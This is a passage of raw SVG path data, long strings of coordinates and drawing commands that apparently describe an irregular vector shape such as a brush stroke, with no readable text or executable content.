3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.